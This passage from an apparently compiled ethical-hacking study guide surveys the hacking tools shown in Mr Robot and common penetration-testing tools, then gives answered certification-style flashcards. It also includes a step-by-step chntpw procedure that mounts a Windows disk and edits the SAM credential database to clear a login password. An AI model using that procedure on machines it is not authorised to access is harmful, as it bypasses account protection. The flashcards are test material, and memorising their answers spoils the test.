11. File transfer - It is important that you know the different techniques to transfer files to a
target machine.
92
Exploring the Hacker Tools of Mr Robot
Over the years the most famous hacking tool that has made it into the movies is Nmap. When
producers of a movie actually try to put a dose of reality into the computer hacking scenes Nmap
will often flash up on the screen. AFAIK Trinity was the first in the Matrix. Nmap has also
appeared in Elysium, The Bourne Ultimatum, Die Hard 4 and many others
The debut season of Mr Robot has received a nod from the security focused twitters for its
attempts at trying to keep things for the most part realistic. In the episodes so far we have seen
hacker types communicating using IRC, there are Linux boxes as far as the eye can see and the
main character wears a hoodie. Of course it is a television show that has to be entertaining so we
have to give them some slack in getting a bit creative. So far they seem to be doing a pretty good
job at maintaining a balance between the story and what is technically possible.
Here is a quick overview of some of the tools that have appeared in the show so far.
Kali Linux
In multiple scenes we can see references to the Kali Linux distribution, a complete
operating system that has been packaged with configured and ready to use penetration
testing (hacking) tools. If you are interested in learning about network security, get a
copy of this and start playing! ** Only in your lab network of course! Breaking into
computers you do not own is illegal in most parts of the world **.
Wget is a terminal program to make HTTP requests, a popular use case is to simply
download the source of a web page or grab a file from a web server in a terminal.
Here this handy tool is used to compromise a system using one of the big
vulnerabilities of 2014 the shellshock bug. You can see the commands being sent in
93
the User Agent of the request to the web server, the command in the screen shot is
simply cat /etc/passwd.
While success was achieved here getting the /etc/passwd file, without
the /etc/shadow file that contains the password hashes the next line where John the
Ripper is launched is never going to work.
94
Canbus Hacking
Car hacking has really hit the big time recently after computer security researchers
remotely hacked into and took control of a Jeep as it was driving down the freeway.
Canbus hacking has been around for a number of years and both car enthusiasts and
security researchers have been poking around to gain access to the computers that
control the modern car.
In the screen shot from Mr Robot we can see candump, one of the Linux utilities used
for viewing the canbus messages.
We see in this scene one of the few Windows desktops shown - during this scene a
security guard inserts a USB drive found in the car park into his system infecting his
Windows XP machine with malware. Leaving infected USB flash drives in the car
park of the target organization is a well known trick to get code onto a system where
network access is limited. In this instance the malware is caught by AVAST anti-
virus.
95
Bluetooth Scanner (btscanner)
btscanner is used here to probe the targets phones for bluetooth capabilities. The tool
attempts to extract as much information as possible from a Bluetooth device without
having to pair. The btscanner program is included in the Kali Linux distribution and
we can see from the title bar of the window that it is the operating system being used
here.
96
Bluesniff
In this screenshot bluesniff can be seen, this is another tool for attacking bluetooth
enabled devices. In this screen shot the actual plan here is to perform a man in the
middle attack against the targets bluetooth keyboard. With keyboard access the next
move is to drop a Meterpreter shell onto the system for access to the target network.
In this shot we can see a few lines from a Meterpretershell. Anyone who has used this
tool knows a little bit of Meterpreter goes a long way so there was no need for an
extensive shot of this powerful tool. Part of the Metasploit penetration testing
framework by Rapid7, a Meterpreter shell gives an attacker full control of the target
system as well as the ability to move around the network.
97
Social Engineer Toolkit (SET)
The Social Engineer Toolkit Social Engineer Toolkit or SET is a framework that
makes setting up social engineering attacks easier. Email based spear phishing attacks,
fake websites and wireless access points can all be launched through its menu system.
In this case they are using the SMS spoofing module.
Windows 95 and Netscape Navigator are mentioned when the lead character is
thinking about his first steps as a hacker. In the screen shot you can see the source
being viewed... careful if you see someone viewing the source they are no doubt a
dangerous hacker. The humble web browser is actually a very useful tool for an
98
attacker whether they are launching web application attacks or researching LinkedIn
for social engineering attacks.
Penetration testing tools cheat sheet, a quick reference high level overview for typical penetration
testing engagements. Designed as a quick reference cheat sheet providing a high level overview
of the typical commands you would run when performing a penetration test. For more in depth
information I’d recommend the man file for the tool or a more specific pen testing cheat sheet
from the menu on the right.
The focus of this cheat sheet is infrastructure / network penetration testing, web application
penetration testing is not covered here apart from a few sqlmap commands at the end and some
web server enumeration. For Web Application Penetration Testing, check out the Web
Application Hackers Hand Book, it is excellent for both learning and reference.
99
Penetration Testing Tools Cheat Sheet ∞
Contents
Penetration Testing Tools Cheat Sheet ∞ ........................................................................... 100
John the Ripper ........................................................................................................................... 101
Cain and Abel (software) ............................................................................................................ 101
Aircrack-ng ................................................................................................................................. 102
Hashcat ........................................................................................................................................ 104
Metasploit ................................................................................................................................... 105
msfconsole........................................................................................................................... 106
msfgui .......................................................................................................................... 106
Ophcrack ..................................................................................................................................... 106
Nmap ........................................................................................................................................... 108
RainbowCrack............................................................................................................................. 109
Wireshark .................................................................................................................................... 110
L0phtCrack ................................................................................................................................. 111
Burp suite .................................................................................................................................... 112
Nessus ......................................................................................................................................... 113
Nikto Web Scanner ..................................................................................................................... 114
Ettercap (software) ...................................................................................................................... 115
Ettercap is a free and open source network security tool for man-in-the-middle attacks on
LAN. It can be used for computer network protocol analysis and security auditing. It runs on
various Unix-like operating systems including Linux, Mac OS X, BSD and Solaris, and on
Microsoft Windows .................................................................................................................... 115
Maltego ....................................................................................................................................... 116
BackTrack ................................................................................................................................... 117
sqlmap ......................................................................................................................................... 118
Armitage (computing) ................................................................................................................. 119
OpenVAS .................................................................................................................................... 120
100
John the Ripper
John the Ripper is a fast password cracker for UNIX/Linux and Mac OS X.. Its primary
purpose is to detect weak Unix passwords, though it supports hashes for many other
platforms as well.
Cain and Abel (software)
UNIX users often smugly assert that the best free security tools support their platform
first, and Windows ports are often an afterthought. They are usually right, but Cain &
Abel is a glaring exception. This Windows-only password recovery tool handles an
enormous variety of tasks. It can recover passwords by sniffing the network, cracking
encrypted passwords using dictionary, brute-force and cryptanalysis attacks, recording
VoIP conversations, decoding scrambled passwords, revealing password boxes,
uncovering cached passwords and analyzing routing protocols
101
Aircrack-ng
Aircrack-ng is a network software suite consisting of a detector, packet
sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs.
It works with any wireless network interface controller whose driver supports raw
monitoring mode and can sniff 802.11a, 802.11b and 802.11g traffic. The program runs
under Linux, FreeBSD, OS X, OpenBSD, and Windows; the Linux version is packaged
for OpenWrt and has also been ported to the Android, Zaurus PDA
and Maemo platforms; and a proof of concept port has been made to the iPhone.
Name Description
Cracks WEP keys using the Fluhrer, Mantin and Shamir attack (FMS) attack,
aircrack-ng PTW attack, and dictionary attacks, and WPA/WPA2-PSK using dictionary
attacks.
airdecap-ng Decrypts WEP or WPA encrypted capture files with known key.
102
airmon-ng Places different cards in monitor mode.
Packet sniffer: Places air traffic into pcap or IVS files and shows information
airodump-ng
about networks.
packetforge-
Creates encrypted packets for injection.
ng
airdecloak-
Removes WEP cloaking from pcap files.
ng
Stores and manages ESSID and password lists and compute Pairwise Master
airolib-ng
Keys.
easside-ng A tool for communicating to an access point, without the WEP key.
103
wesside-ng Automatic tool for WEP key recovery.
Hashcat
Hashcat is powerfull utility for recovering passwords from hash. It supports over 200
hash algorithms. It can use CPU, GPU and other hardware accelerators.
Hashcat offers multiple attack modes for obtaining effective and complex coverage over a hash's
keyspace. These modes are:
Brute-force attack[5]
Combinator attack[6]
Dictionary attack[7]
Fingerprint attack
Hybrid attack[8]
Mask attack[9]
Permutation attack
Rule-based attack[10]
Table-Lookup attack (CPU only)
Toggle-Case attack[11]
104
PRINCE attack[12] (in CPU version 0.48 and higher only)
The traditional bruteforce attack is considered outdated, and the Hashcat core team recommends
the Mask-Attack as a full replacement.
Metasploit
The Metasploit Project is a computer security project that provides information
about security vulnerabilities and aids in penetration testing and IDS
signature development.
Its best-known sub-project is the open-source[2] Metasploit Framework, a tool for
developing and executing exploit code against a remote target machine. Other important
sub-projects include the Opcode Database, shellcode archive and related research.
The Metasploit Project is well known for its anti-forensic and evasion tools, some of
which are built into the Metasploit Framework. It is very powerful tool. Metasploit is pre
installed in the operating system that is Kali Linux.
The Metasploit Project offers penetration (pen) testing software and provides tools for
automating the comparison of a program's vulnerability and its repaired (patched)
version. Anti-forensic and advanced evasion tools are also offered, some of them built
into the Metasploit Framework.
Metasploit Framework, the Metasploit Project's best-known creation, is a software
platform for developing, testing, and executing exploits. It can be used to create security
testing tools and exploit modules and also as a penetration testing system
105
The Metasploit Framework (MSF) provides the ability to launch exploits against selected
target systems, and to perform post-exploitation tasks, such as uploading files, running
processes, establishing backdoor network connections, monitoring system use, and many
more. Therefore, its primary use is in the penetration testing process.
Another important use of the MSF is in systems administration. So far, the development
of exploits has been limited to a select group of people within the security research,
hacking and testing communities. With the help of a reliable exploitation platform like
Metasploit, administrators are now able to check multiple servers for vulnerability to a
given exploit, and what’s more, they can even go to the extent of running the exploit, to
determine if the systems are indeed vulnerable.
msfconsole
The msfconsole (see Figure 1) is probably the most popular interface to the MSF. It
provides an “all-in-one” centralised console. It is the traditional and primary means of
using the MSF, and is the only supported way to access most of the features of
Metasploit. It is the most stable MSF Interface. After installation, launch it by
running ./msfconsole (from within the directory where it has been installed).
Figure 1: The user interface of msfconsole
msfgui
msfgui is, as the name implies, the graphical user interface of the framework. It is a good
tool for demonstrations to clients and management; it provides a point-and-click interface
for exploitation, and a GTK wizard-based interface to use the MSF.
Ophcrack
Ophcrack is a free open-source (GPL licensed) program that cracks Windows log-in
passwords by using LM hashes through rainbow tables. The program includes the ability
to import the hashes from a variety of formats, including dumping directly from the SAM
106
files of Windows. On most computers, ophcrack can crack most passwords within a few
minutes.[1]
Rainbow tables for LM hashes are provided for free by the developers. By default,
ophcrack is bundled with tables that allows it to crack passwords no longer than 14
characters using only alphanumeric characters. Available for free download are four
Windows XP tables and four Windows Vista tables.[2]
Ophcrack v3.6.0, in its LiveCD form (currently at v3.6.0), is simply the best way to recover a
Windows password. It's nearly fool-proof operation, automatic password recovery, and overall
speed puts Ophcrack in a league of its own.
The Ophcrack LiveCD requires some preparation but this password recovery tool is by far the
best.
After just a few minutes of running the software, Ophcrack will find all of your Windows
passwords and display them on screen! Yes, it's that easy!
107
Nmap
Nmap (Network Mapper) is a free and open-source network scanner created by Gordon
Lyon (also known by his pseudonym Fyodor Vaskovich).[3] Nmap is used to
discover hosts and services on a computer network by sending packets and analyzing the
responses.
Nmap provides a number of features for probing computer networks, including host
discovery and service and operating system detection. These features are extensible
by scripts that provide more advanced service detection,[4] vulnerability detection,[4] and
other features. Nmap can adapt to network conditions
including latency and congestion during a scan.
Nmap started as a Linux utility[5] and was ported to other systems
including Windows, macOS, and BSD.[6] Linux is the most popular platform, followed by
Windows.[7]
108
RainbowCrack
RainbowCrack is a computer program which generates rainbow tables to be used
in password cracking. RainbowCrack differs from "conventional" brute force crackers in
that it uses large pre-computed tables called rainbow tables to reduce the length of time
needed to crack a password drastically.[1] RainbowCrack was developed by Zhu
Shuanglei, and implements an improved time–memory tradeoff cryptanalysis attack
which originated in Philippe Oechslin's Ophcrack.[1]
The RainbowCrack tool is a hash cracker that makes use of a large-scale time-memory
trade-off. A traditional brute force cracker tries all possible plaintexts one by one, which
can be time consuming for complex passwords. RainbowCrack uses a time-memory
109
trade-off to do all the cracking-time computation in advance and store the results in so-
called "rainbow tables". It does take a long time to precompute the tables but
RainbowCrack can be hundreds of times faster than a brute force cracker once the
precomputation is finished.
Wireshark
Wireshark is a free and open-source packet analyzer. It is used for network
troubleshooting, analysis, software and communications protocol development, and
education
Wireshark is a network or protocol analyzer (also known as a network sniffer) available for free
at the Wireshark website. It is used to analyze the structure of different network protocols and
has the ability to demonstrate encapsulation. Wireshark shares many characteristics with
tcpdump. The difference is that it supports a graphical user interface (GUI) and has information
filtering features. In addition, Wireshark permits the user to see all the traffic being passed over
the network.
Data is analyzed either from the wire over the network connection or from data files that
have already captured data packets.
Supports live data reading and analysis for a wide range of networks (including Ethernet,
IEEE 802.11, point-to-point Protocol (PPP) and loopback).
With the help of GUI or other versions, users can browse captured data networks.
110
For programmatically editing and converting the captured files to the editcap application,
users can use command line switches.
Display filters are used to filter and organize the data display.
New protocols can be scrutinized by creating plug-ins.
Captured traffic can also trace Voice over Internet (VoIP) calls over the network.
When using Linux, it is also possible to capture raw USB traffic.
L0phtCrack
L0phtCrack attempts to crack Windows passwords from hashes which it can obtain (given
proper access) from stand-alone Windows workstations, networked servers, primary domain
controllers, or Active Directory. In some cases it can sniff the hashes off the wire. It also has
numerous methods of generating password guesses (dictionary, brute force, etc). LC5 was
discontinued by Symantec in 2006, then re-acquired by the original L0pht guys and reborn as
LC6 in
111
2009.
Burp suite
Burp Suite is an integrated platform for performing security testing of web applications. Its
various tools work seamlessly together to support the entire testing process, from initial
mapping and analysis of an application’s attack surface, through to finding and exploiting
security vulnerabilities.
Burp gives you full control, letting you combine advanced manual techniques with state-
of-the-art automation, to make your work faster, more effective, and more fun.
burpsuite – Platform for security testing of web applications
Tool for security testing of web applications.
112
Nessus
Nessus is a proprietary vulnerability scanner developed by Tenable Network Security.
Nessus allows scans for the following types of vulnerabilities:
Vulnerabilities that allow a remote hacker to control or access sensitive data on a system.
Misconfiguration (e.g. open mail relay, missing patches, etc.).
Default passwords, a few common passwords, and blank/absent passwords on some
system accounts. Nessus can also call Hydra (an external tool) to launch a dictionary
attack.
Denials of service against the TCP/IP stack by using malformed packets
Preparation for PCI DSS audits
Nessus provides additional functionality beyond testing for known network
vulnerabilities. For instance, it can use Windows credentials to examine patch levels on
computers running the Windows operating system, and can perform password auditing
using dictionary and brute force methods. Nessus 3 and later can also audit systems to
make sure they have been configured per a specific policy, such as the NSA's guide for
113
hardening Windows servers. This functionality utilizes Tenable's proprietary audit files
or Security Content Automation Protocol (SCAP) content.
114
Ettercap (software)
Ettercap is a free and open source network security tool for man-in-the-middle attacks on
LAN. It can be used for computer network protocol analysis and security auditing. It runs
on various Unix-like operating systems including Linux, Mac OS X, BSD and Solaris,
and on Microsoft Windows
It is capable of intercepting traffic on a network segment, capturing passwords, and
conducting active eavesdropping against a number of common protocols. Its original
developers later founded Hacking Team. Ettercap works by putting the network interface
into promiscuous mode and by ARP poisoning the target machines. Thereby it can act as
a 'man in the middle' and unleash various attacks on the victims. Ettercap has plugin
115
support so that the features can be extended by adding new plugins
Maltego
116
BackTrack
BackTrack was a Linux distribution that focused on security, based on the Knoppix
Linux distribution aimed at digital forensics and penetration testing use. In March 2013,
the Offensive Security team rebuilt BackTrack around the Debian distribution and
released it under the name Kali Linux
BackTrack Linux is a fine example of a specialized Linux distribution. Its only purpose
is to test your network, devices, and systems for security vulnerabilities. BackTrack is
packed with every security and hacker tool used by security professionals and
professional hackers.
Back|Track Linux is an open source GPL-compliant Linux distribution built by
penetration testers, for penetration testers with development staff consisting of
individuals spanning different languages, regions, industries, and nationalities.
The evolution of Back|Track Linux took place over many years of development,
penetration tests, and unprecedented help from the security community. Back|Track
originally started with earlier versions of Live Linux distributions called Whoppix,
IWHAX, and Audito
117
sqlmap
sqlmap is an open source software that is used to detect and exploit database
vulnerabilities and provides options for injecting malicious codes into them. It is a
penetration testing tool that automates the process of detecting and exploiting SQL
injection flaws providing its user interface in the terminal.
sqlmap is an open source penetration testing tool that automates the process of detecting
and exploiting SQL injection flaws and taking over of database servers. It comes with a
powerful detection engine, many niche features for the ultimate penetration tester and a
broad range of switches lasting from database fingerprinting, over data fetching from the
database, to accessing the underlying file system and executing commands on the
operating system via out-of-band connections.
sqlmap is an open source penetration testing tool that automates the process of detecting
and exploiting SQL injection flaws and taking over of database servers.
A successful SQL injection attack can read sensitive server data like passwords, email,
username, etc. SQL injection can be very harmful. This is a list of the best and most
popular SQL injection tools: SQLMap - Automatic SQL Injection And Database
Takeover Tool. sqlmap is an open source penetration testing tool that automates the
118
process of detecting and exploiting SQL injection flaws and taking over of database
servers. ... Support to dump database tables entirely, a range of entries or specific
columns as per user's choice
Armitage (computing)
Armitage is a graphical cyber attack management tool for the Metasploit Project that
visualizes targets and recommends exploits. It is a free and open source network
security tool notable for its contributions to red team collaboration allowing for: shared
sessions, data, and communication through a single Metasploit instance
With Armitage, enterprises can easily locate the machines running on a network,
including the flavor and version of the OS running on each device. With that information,
Armitage provides a thorough list of potentially successful attack methods for each OS
version. Security pros can either run a specific attack method provided by Armitage to
see if a machine will be compromised, or they can deploy a "Hail Mary" scenario, which
essentially throws every attack method available at a device to determine which would be
successful for an attacker. Armitage even provides the capability to take webcam shots
and log keystrokes on victim machines, allowing a more thorough assessment of an
organization's attack surface. With the free Armitage tool, performing vulnerability
assessments and securing vulnerable machines has never been easier
119
OpenVAS
The OpenVAS scanner is a comprehensive vulnerability assessment system that can
detect security issues in all manner of servers and network devices. Use this hosted
version of the OpenVAS software to easily test your Internet infrastructure.
Results will be delivered to your email address for analysis; allowing you to start re-
mediating any risks your systems face from external threats.
The primary reason to use this scan type is to perform comprehensive security testing of
an IP address. It will initially perform a port scan of an IP address to find open services.
Once listening services are discovered they are then tested for known vulnerabilities and
mis-configuration using a large database (more than 53000 NVT checks). The results are
then compiled into a report with detailed information regarding each vulnerability and
notable issues discovered.
120
Once you receive the results of the tests, you will need to check each finding for
relevance and possibly false positives. Any confirmed vulnerabilities should be re-
mediated to ensure your systems are not at risk.
Vulnerability scans performed from externally hosted servers give you the same
perspective as an attacker. This has the advantage of understanding exactly what is
exposed on external facing services.
Full Scan for a full test of network, server and web application vulnerabilities.
Web Server Scan a more focused test for web server and web application vulnerabilities.
WordPress Scan testing for known WordPress vulnerabilities and web server issues.
Joomla Scan testing for known Joomla vulnerabilities and web server issues.
121
chntpw
If you (or someone you know) ever forget your Windows password, you'll be glad to
know about chntpw, a neat Linux utility that you can use to reset a Windows password
122
Here are the steps, along with screenshots, to guide you through the quick and super easy
process of resetting your Windows password with chntpw.
1. Attach the Live USB to your PC and restart from the login screen, as shown below:
passwordreset_login-pass.png
2. Boot from the Live USB and click on Try Fedora:
passwordreset_boot.png
123
passwordreset_try-fedora.png
124
3. Log out from live-user and log into root. This step is not necessary, but I prefer to use
the root user to bypass any permission issues:
passwordreset_root.png
125
4. Install the chntpw utility with the following command (you'll need a live internet
connection for this):
sudo dnf install -y chntpw
passwordreset_install.png
126
5. Check which partition should be mounted by sfdisk -l ...:
passwordreset_sfdisk.png
127
and mount that partition (e.g., /dev/sda2) with the following command:
sudo mount /dev/sda2 /mnt/Microsoft/
mount-1.png
Change the current directory to the config directory:
cd /mnt/Microsoft/Windows/System32/config/
passwordreset_mount-2.png
128
Also, check the user records in the Security Account Manager (SAM) database:
passwordreset_mount-3.png
6. Edit the SAM database with the command:
sudo chntpw -i SAM
Then type 1 (for Edit user data and passwords):
passwordreset_username-1.png
And type your user account name (i.e., Archit-PC in this example) for the username:
129
passwordreset_username-2.png
7. Type 1 to clear the user password or 2 to set a new password for the Archit-PCuser,
then quit and save the changes:
passwordreset_clear-1.png
130
passwordreset_clear-2.png
8. Reboot to Windows. If you selected 1 above, you'll see there's no password required to
log in. Just click Sign in and you will be logged in:
131
passwordreset_nopass-1.png
passwordreset_nopass-2.png
132
Zenmap
Zenmap is an free and open source GUI designed to be used with nmap . Zenmap is
multiplatform tool which supports Linux, Ubuntu, Mint, Kali, Fedora, CentOS,.. ,
Windows, Mac OS X, BSD etc. . nmap is very powerful tool for network scanning and
vulnerability discovery but it is completely command line based. Zenmap can be used by
novice users to scan network and discover vulnerabilities.
Zenmap GUI
Zenmap is GUI form of nmap and provides some input areas for parameters.
Target is the remote target we want to scan. We can put single of multiple targets like
nmap.
Profile is the scan options like speed and detail which is preconfigured as Intense Scan in
this example.
Command is the command which will run in command line and created with the given
parameters.
Scan will start the scan process.
133
Zenmap Portable
Zenmap vs Nmap
Zenmap is just a GUI form which can be used by novice users. It completely
uses nmap command line tool. So they do not have similarities or differencies. They just
completes each other.
As Zenmap is a GUI tool it doesn provide any command line support and just a form to
convert given options to the nmap command line options.
134
Putty
PuTTY is a versatile terminal program for Windows. It is the world's most popular free
SSH client. It supports SSH, telnet, and raw socket connections with good terminal
emulation. It supports public key authentication and Kerberos single-sign-on. It also
includes command-line SFTP and SCP implementations.
Like OpenSSH, PuTTY is a very versatile tool for remote access to another computer. It's
probably used more often by people who want secure remote shell access to a UNIX or
135
Linux system than for any other purpose, though that is only one of its many uses.
PuTTY is more than just an SSH client.
PuTTY works by sending typed commands and receiving text responses over a tcp/ip
socket like a traditional terminal (TTY), but it uses secure socket (SSH) with public key
encryption wrapping the packet payloads
1. Nmap
Nmap turned 20 years old on September 1, 2017. Since it was first released, Nmap has been the go-to
tool for network discovery and attack surface mapping. From host discovery and port scanning, to OS
detection and IDS evasion / spoofing, Nmap is an essential tool for gigs both large and small.
2. Aircrack-ng
136
Like Nmap, Aircrack-ng is one of those tools that pen testers not only know, if they're assessing a
wireless network, they're using it on a regular basis. Aircrack-ng is a full suite of wireless assessment
tools, covering packet capture and attacking (including cracking WPA and WEP).
3. Wifiphisher
Wifiphisher is a rogue access point tool, enabling automated phishing attacks against Wi-Fi networks.
Assessments using Wifiphisher can lead to credential harvesting or actual infection, depending on the
scope of the job. A full overview is available in the documentation section on the Wifiphisher website.
4. Burp Suite
Used with a web browser to map applications, Burp Suite can discover a given app's functionality and
security issues. From there, it's possible to launch custom attacks.
Currently, the free version is pretty limited, but the paid version ($349 per user) offers full crawling
and scanning (supporting more than 100 vulnerabilities – including all of the OWASP Top 10);
multiple attack points, and scope-based configurations). One of the most common remarks we heard
about this tool is that it can be used to automate repetitive functions, and offers a decent view of what
the app is doing with the server.
5. OWASP ZAP
OWASP Zed Attack Proxy (ZAP) was another application testing tool mentioned alongside Burp
Suite. The general view is that ZAP is good for those that are just starting out with application
security, while Burp Suite is the go to hardcore assessment tool. Those who are concerned about price
lean towards ZAP because it is open source. OWASP recommends ZAP for application testing, and
they've published a number of tutorials for making it work in a long-term security project.
6. SQLmap
As the website says, SQLmap is an "automatic SQL Injection and database takeover tool." This
description really explains the heart of the tool itself. It supports all the common and widely used
database platforms – MySQL, MSSQL, Access, DB2, PostgreSQL, Sybase, SQLite – and six
different attacks.
7. CME (CrackMapExec)
CME is a post-exploitation tool that will help automate the task of assessing the security of large
Active Directory networks. Its author, a hacker known as 'byt3bl33d3r' says the tool follows the
concept of living off the land by "abusing built-in Active Directory features/protocols to achieve its
functionality and allowing it to evade most endpoint protection/IDS/IPS solutions."
While the red team case for using CME is clear, blue teams can also use the tool to assess account
privileges, simulate attacks, and find misconfigurations. CME also makes use of the PowerSploit
Toolkit and the Impacket library.
8. Impacket
137
Impacket, which is used by CME, is a collection of Python classes for low-level programmatic access
to protocols like SMB1-3, or TCP, UDP, ICMP, IGMP, and ARP on IPv4 / IPv6. Packets can be
constructed from scratch or parsed form raw data.
9. PowerSploit
PowerSploit is a collection of modules that can be used during assessments. As the name suggests, the
modules themselves are for PowerShell on Windows. Some of the features include persistence, AV
bypasses, exfiltration, code execution, script modification, reconnaissance, and more.
10. Luckystrike
Luckystrike, from curi0usJack, is a generator of malicious Excel (.xls) and Word (.doc) documents.
Luckystrike can work with standard shell commands, PowerShell scripts, and EXEs. Additional
information and usage details are available here.
BeEF is a handy tool to assess "actual security posture of a target environment by using client-side
attack vectors." Several professionals mentioned BeEF in passing, and noted that it was rather easy to
use given the number of features and options the tool offers. You can learn more about BeEF here.
12. THC-Hydra
THC-Hydra is a network login cracker that supports several services. In fact, it supports more than
four dozen of them, including Cisco auth, Cisco enable, IMAP, IRC, LDAP, MS-SQL, MYSQL,
Rlogin, Rsh, RTSP, and SSH (v1 & v2). The tool isn't overly complex, and the extensive README
file covers plenty of detail to get users started.
The Immunity Debugger is a tool that will help security professionals write exploits, analyze malware,
and reverse engineer binaries. There are a ton of features, but the two writeups that best cover a
majority of them are an overview by Igor Novkovic and a SANS Reading Room paper on basic
reverse engineering. If reversing or exploit writing are in your wheelhouse, this tool is likely
something you're familiar with already, if it isn't – it's worth a look.
As the name suggests, SET is a pen testing framework geared towards social engineering. It's a
popular tool, and has even been featured on television. Hackers were pleased to see some reality on
TV when SET was actively used on USA Network's Mr. Robot.
There are two other tools from TrustedSec that are also worth mentioning: Unicorn, which is a tool for
using PowerShell downgrade attacks and injecting code directly into memory (this works great with
SET), and nps_payload, which generates payloads for intrusion detection avoidance.
15. Metasploit
138
The Metasploit Framework is so commonly used, we almost didn't add it to the list. However, it had
more mentions than any other tool outside of Kali Linux. (Kali is a Linux distribution, and it has many
of the tools mentioned here pre-installed.)
Metasploit has been the main tool for many pen testing professionals for years. Even after it was
acquired by Rapid7, it remains fully supported as an open source project and is constantly being
developed by an entire community of exploit developers and coders. If a vulnerability or exploit is in
the news, Metasploit will have it. Need to assess the security of a network against older
vulnerabilities? Metasploit can do that.
The HighOn.Coffee blog's penetration tools cheat sheet offers a high-level reference for several
common commands, from network configuration, to port scanning and attacking network services.
17. SecLists
SecLists, as the name suggests, is a collection of lists (usernames, passwords, common data patterns,
fuzzing payloads, shells, etc.) available on GitHub to help pen testers get a jump on their current
assignment.
139
Flashcards
From the following, identify the attack in which an attacker exploit default configuration
and settings of off-the-self libraries and code.
Shrink- Wrap Code Attacks
Identify the hacking phase in which an attacker tries to gather information about the target
prior to launch an attack.
Reconnaissance
In which type of Social engineering technique does an attacker secretly observers the target
to gain critical information such as passwords, credit card information, etc.?
Shoulder Surfing
Google supports several advanced operators that help in modifying the search. Which of
the following Google advanced search operator displays the web pages stored in the Google
cache
[cache:]
140
Which command can be used to view NetBIOS information?
nbtstat
What is the last phase before you attempt to gain access to systems?
Enumeration
141
A sparse infector virus ________.
Infects Files Selectively
Social Engineering can be thwarted using what kind of controls? (select all that apply)
Technical , Administrative, Physical
Social Engineering preys on many weaknesses, including _____________. (choose all that
apply)
Technology, People, Human nature, Physical
You receive word of an unauthorized charge to you credit card. What type of attack is
this?
Identity Theft
Using __________, when talking to a victim can make the attack easier.
Keywords
An attack that includes an enticing link to click on, is what type of attack?
Phishing
Groups and individuals who hack systems based on principle or personal beliefs are know
as __________.
Hacktivists
Which DoS attack sends traffic with a spoofed IP of the target itself?
142
Land
What is an eight in one DoS tool that can launch such attacks as land and teardrop?
Targa
Which of the following is used to access content outside the root of a website?
Directory Traversing
What is used to monitor application errors and violations on a web server or application?
Logs
Groups and individuals who hack web server or web application based on a principle or
personal belief are?
Hacktivists
What may be helpful in protecting the content of a web server from being viewed by
unauthorized personnel?
Encryption
What type of database has information spread across many desperate systems?
Distributed
A blind SQL injection attack is used when which of the following is true?
Error messages are not available
144
Which of the following is designed to locate wireless access points?
Site Survey
What could a company do to protect itself from a lass of date when a phone is stolen?
Passwords, Encryption, Remote wipe
Session hijacking can be used against a mobile device using all the following Except?
Worms
145
Which technology can provide protection against session hijacking?
IPSec
What option would you use to install software that's not from the Google Play store?
Install from unknown sources
Session hijacking can be performed on all the following except which one?
IPSEC
A Session hijack cab be initiated from all the following except which one?
Cookies and devices
An ethical hacker sends a packet with a deliberate and specific path to its destination.
What technique is being used?
Source Routing
Which type of biometrics is frequently found on laptops but can be used on entryways as
well?
Fingerprint
Which of the following is used to prevent cars from ramming the building?
Bollard
Dogs make good addition to security, but what is the concern with dogs?
Liability
Which of the following is a characteristic of USB flash drives that makes security a
problem?
Easily Hidden
What type of cloud service would provide email hosting and associated security services?
Saas
What can be used instead of a URL to evade some firewalls used to protect a cloud-based
web application?
IP Address
What system is used as a choke point for traffic and could be offered through Iaas?
Bastion Host
Which of the following issues would be a good reason for migrating to the cloud
environment? (Select all that apply)
Reduce Cost, Improve Performance, Increased Redundancy
148
Rules of engagement
What are two popular command line tools used to query a DNS server?
dig and nslookup
What protocol supports querying of data related to entities who register public domains
and other Internet resources?
Whois
What is the term that defines the process of turning passive reconnaissance results into
directions or launch points for active reconnaissance and preliminary attacks?
Weaponization
What must you do after a vulnerability scan to ensure that the weaknesses are actually
exploitable?
validate the vulnerabilities
A web server running Apache would point to what operating system type?
Linux
149
What term describes an attempt to gain information about targeted computers and
networks without actively engaging with the systems?
Passive reconnaissance
What social engineering technique is described by telling an employee that a decision must
be made within a small amount of time?
Urgency
What term describes a method where an attacker attempts to obtain sensitive information
from a user by posing as a trustworthy figure through email?
Phishing
What term describes phishing over phone/cell phone/VOIP, voice communication which
creates more trust that SMS?
Vishing
What term describes a type of attack where the attacker slips in through a secure area
where following an authorized employee?
Tailgating
What is a term that describes the act of surmounting a height-based physical barrier in
order to gain access to a restricted area?
Fence Jumping
What is the term used to describe a process that queries a device or service for information
about its configuration and resources and is an important part of active reconnaissance?
Enumeration
What term describes a connection type that allows any client to make an unauthenticated
connection to the IPC$ (interprocess communication) share on the host?
Null Session
What type of scan verifies a network adheres to policy requirements, as mandated by law,
industry, or individual company?
Compliance
What tool can be used to check if apps are listening on random ports?
Netstat
What term defines the process of evaluating and ranking vulnerabilities in terms of the
potential threat they may pose to the organization?
Adjudication
150
What term describes a mechanism that delivers the payload, otherwise known as sequence
of commands that takes advantage of a vulnerability?
Exploitation
What term describes code that has been compiled into an executable on one platform, but
is designed to run on a different platform?
Cross-compiled code
What term describes an attack in where passwords in the wordlist have been pre-computed
into their corresponding hashes, then compressed in a highly efficient manner?
Rainbow table attack
What term describes a software or hardware tool that can intercept and log traffic on a
digital network?
Sniffing
What term describes taking a user's or client's place after it has established a TCP
connection with a server?
TCP Session High jacking
What Browser Session Hijacking method that uses ARP poisoning and Wireshark to sniff
the user's HTTP session and steal the cookie?
Sidejacking
What type of attack is described by setting up a rogue access point use to deceive users into
believing that it is a legitimate access point?
Evil Twin Attack
What is the term that describes any condition that allows attackers to gain elevated access
to a compromised Windows system?
Privilege Escalation
What term describes the act of attempting to deduce or decode encrypted passwords?
Password Cracking
151
What mobile operating system based on Linux?
Android
What exploit overwrites the firmware, bypassing security controls which gives users root
privilege and can install unauthorized applications including malware?
Jailbreaking
What term describes an attack in which malicious JavaScript is inserted and executes on
the client's browser?
Cross-Site Scripting
What term describes an attack where an established trust between and authorized user and
a website is exploited?
Cross-Site Request Forgery
What term describes an attack where a user is fooled into clicking a web page link that is
different from where they had intended to land?
Clickjacking
What type of testing is a dynamic testing method used to identify vulnerabilities in apps by
sending the app random or unusual input and noting any failures?
Fuzz Testing
What term describes the process of manipulating a program's running state in order to
analyze it for general bugs, vulnerabilities, and other issues?
Debugging
What term describes the process of moving from one part of a computing environment to
another; Example: from one network host to another?
Lateral Movement
